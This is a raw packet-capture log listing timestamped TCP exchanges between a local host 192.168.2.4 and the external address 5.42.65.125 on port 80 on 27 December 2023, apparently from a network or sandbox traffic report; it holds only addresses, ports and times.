Dec 27, 2023 18:12:23.675973892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.676008940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.676064014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.678109884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.678121090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.678144932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.680628061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.680640936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.680685043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.683379889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.683393002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.683434010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.685806036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.685820103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.685857058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.688039064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.688102007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.688150883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.690639973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.690656900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.690691948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.692826033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.692840099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.692888975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.695094109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.695106983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.695163012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.697671890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.697721958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.700362921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.700376034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.700436115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.702725887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.702739000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.702781916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.704844952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.704922915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.704984903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.707396984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.707410097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.707464933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.710067034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.710079908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.710155010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.711813927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.711826086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.711903095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.714005947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.714073896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.714840889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.716314077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.716327906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.716372967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.718800068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.718812943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.718864918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.721003056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.721031904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.721095085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.723289967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.723303080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.723359108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.725502968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.725523949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.725594044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.728028059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.728069067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.728127003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.729803085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.729933977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.729984045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.729986906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.731771946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.731786013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.731827974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.734553099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.734576941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.734626055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.738275051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.738290071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.738351107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.738818884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.738837004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.738879919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.740307093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.740319014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.740366936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.742208958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.742221117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.742279053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.744373083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.744385958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.744434118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.746532917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.746555090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.746604919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.748608112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.748647928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.748691082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.750611067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.750624895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.750653982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.752696991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.753793001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.754667997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.754681110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.754846096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.756570101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.756592035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.756634951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.758455992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.758481979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.758527040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.760552883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.760577917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.760622025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.763053894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.763355970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.763380051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.763520956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.764389992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.764413118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.764467001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.766443014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.766472101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.766505957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.768605947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.768659115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.768688917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.770318031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.770330906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.770378113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.772018909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.772032022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.772073030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.774156094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.774171114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.774223089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.775795937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.775834084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.775871992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.777951956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.777965069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.778002977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.779711962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.779725075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.779757023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.782156944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.782169104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.782217979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.782928944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.782943010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.782984972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.786705017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.786719084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.786756992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.787096024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.787123919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.787175894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.788594961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.788608074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.788639069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.790932894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.790981054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.791035891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.792143106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.792156935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.792193890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.793893099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.793982029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.795542002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.795578003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.797585964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.797626019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.799124956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.800607920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.800637960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.803046942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.803085089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.803147078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.804868937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.804905891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.806833029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.807642937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.807780981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.810832024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.810931921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.810967922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.813848972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.814973116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.815016985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.817640066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.817652941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.817687988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.817717075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.820606947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.820621014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.820662975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.823753119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.823766947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.823813915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.827392101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.827404976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.827452898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.831996918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.832010031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.832055092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.832920074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.832932949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.832983971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.836276054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.836292982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.836344004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.839051962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.839063883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.839108944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.842542887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.842556000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.842621088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.849812984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.849850893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.849936962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.850366116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.850378990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.850420952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.851632118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.851685047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.854370117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.854382992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.854423046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.854448080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.862535954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.862564087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.862618923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.863337040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.863348961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.863400936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.865590096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.865628958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.866837978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.869740009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.869754076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.869796991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.870378971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.870392084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.870436907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.871531010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.871542931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.871587992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.874666929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.874681950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.874736071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.877978086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.878026009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.878082991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.880069971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.880114079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.880162001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.882842064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.882929087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.882978916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.889024019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.889036894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.889205933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.889430046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.889441967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.889512062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.891429901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.891443014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.891505957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.893662930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.893707991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.894830942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.896670103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.896686077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.897931099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.899961948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.900012970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.901798964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.901818991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.901860952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.901896954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.905841112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.905853033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.905913115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.907418966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.907430887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.907481909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.907975912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.907988071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.908049107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.909831047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.909845114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.909889936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.912602901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.912616014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.912687063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.915338993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.915353060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.915425062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.917782068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.917795897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.917849064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.920393944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.920490980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.920555115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.922655106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.924801111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.924813986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.924880028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.926695108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.926737070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.928467035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.928539038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.928592920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.929917097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.929930925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.929989100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.932450056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.932533979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.932585001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.935056925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.937410116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.937421083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.937465906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.937865973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.937908888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.939618111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.939631939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.939686060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.941883087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.944751978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.944763899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.944813013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.947048903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.947099924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.947103977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.949290991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.949302912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.949352026 CET	49738	80	192.168.2.4	5.42.65.125
